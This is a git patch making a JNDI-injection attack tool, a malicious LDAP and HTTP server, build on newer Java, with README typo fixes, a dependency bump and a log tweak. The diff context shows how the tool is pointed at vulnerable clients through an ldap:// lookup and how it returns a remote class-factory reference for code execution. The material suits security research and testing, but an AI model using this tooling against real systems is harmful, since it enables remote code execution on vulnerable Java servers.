From 6af18485a82a03fc7116364713ff0e78f08bf6a3 Mon Sep 17 00:00:00 2001
From: Michael Stepankin <artsploit@gmail.com>
Date: Thu, 19 Mar 2020 12:16:41 +0000
Subject: [PATCH] Make it compatible with java11

---
 README.md                                                | 5 ++---
 pom.xml                                                  | 6 +++---
 src/main/java/artsploit/HttpServer.java                  | 2 --
 src/main/java/artsploit/controllers/RemoteReference.java | 2 +-
 4 files changed, 6 insertions(+), 9 deletions(-)

diff --git a/README.md b/README.md
index 95f09c6..1a0e233 100755
--- a/README.md
+++ b/README.md
@@ -3,11 +3,11 @@ A malicious LDAP server for JNDI injection attacks.
 
 ### Description
 The project contains LDAP & HTTP servers for exploiting insecure-by-default Java JNDI API.<br> 
-In order to perform an attack, you can start these servers localy and then trigger a JNDI resolution on the vulnerable client, e.g.: 
+In order to perform an attack, you can start these servers locally and then trigger a JNDI resolution on the vulnerable client, e.g.:
 ```java
 InitialContext.lookup("ldap://your_server.com:1389/o=reference");
 ```
-It will initiate a connection from the vulnerable clinet to the local LDAP server. 
+It will initiate a connection from the vulnerable client to the local LDAP server.
 Then, the local server responds with a malicious entry containing one of the payloads, that can be useful to achieve a Remote Code Execution. 
 
 ### Motivation
@@ -62,7 +62,6 @@ Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere
 Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
 ```
 
-
 ### Building
 Java v1.7+ and Maven v3+ required
 ```
diff --git a/pom.xml b/pom.xml
index aca5bb5..3a31dcf 100755
--- a/pom.xml
+++ b/pom.xml
@@ -35,7 +35,7 @@
         <dependency>
             <groupId>org.reflections</groupId>
             <artifactId>reflections</artifactId>
-            <version>0.9.11</version>
+            <version>0.9.12</version>
         </dependency>
 
         <dependency>
@@ -83,8 +83,8 @@
                 <artifactId>maven-compiler-plugin</artifactId>
                 <version>3.8.1</version>
                 <configuration>
-                    <source>7</source>
-                    <target>7</target>
+                    <source>8</source>
+                    <target>8</target>
                 </configuration>
             </plugin>
         </plugins>
diff --git a/src/main/java/artsploit/HttpServer.java b/src/main/java/artsploit/HttpServer.java
index 0652365..07cf04f 100755
--- a/src/main/java/artsploit/HttpServer.java
+++ b/src/main/java/artsploit/HttpServer.java
@@ -6,10 +6,8 @@ import javassist.ClassPool;
 import javassist.CtClass;
 import javassist.CtConstructor;
 import org.apache.commons.lang3.reflect.FieldUtils;
-import org.reflections.Reflections;
 
 import java.io.ByteArrayOutputStream;
-import java.lang.reflect.Field;
 import java.net.InetSocketAddress;
 import java.util.concurrent.Executors;
 import java.util.jar.JarOutputStream;
diff --git a/src/main/java/artsploit/controllers/RemoteReference.java b/src/main/java/artsploit/controllers/RemoteReference.java
index ba2ae29..570076d 100644
--- a/src/main/java/artsploit/controllers/RemoteReference.java
+++ b/src/main/java/artsploit/controllers/RemoteReference.java
@@ -29,7 +29,7 @@ public class RemoteReference implements LdapController {
 
     public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
         Entry e = new Entry(base);
-        System.out.println("Sending LDAP reference result for " + classloaderUrl);
+        System.out.println("Sending LDAP reference result for " + classloaderUrl + "xExportObject.class");
         e.addAttribute("objectClass", "javaNamingReference");
         e.addAttribute("javaClassName", "xUnknown"); //could be any unknown
         e.addAttribute("javaFactory", "xExportObject"); //could be any unknown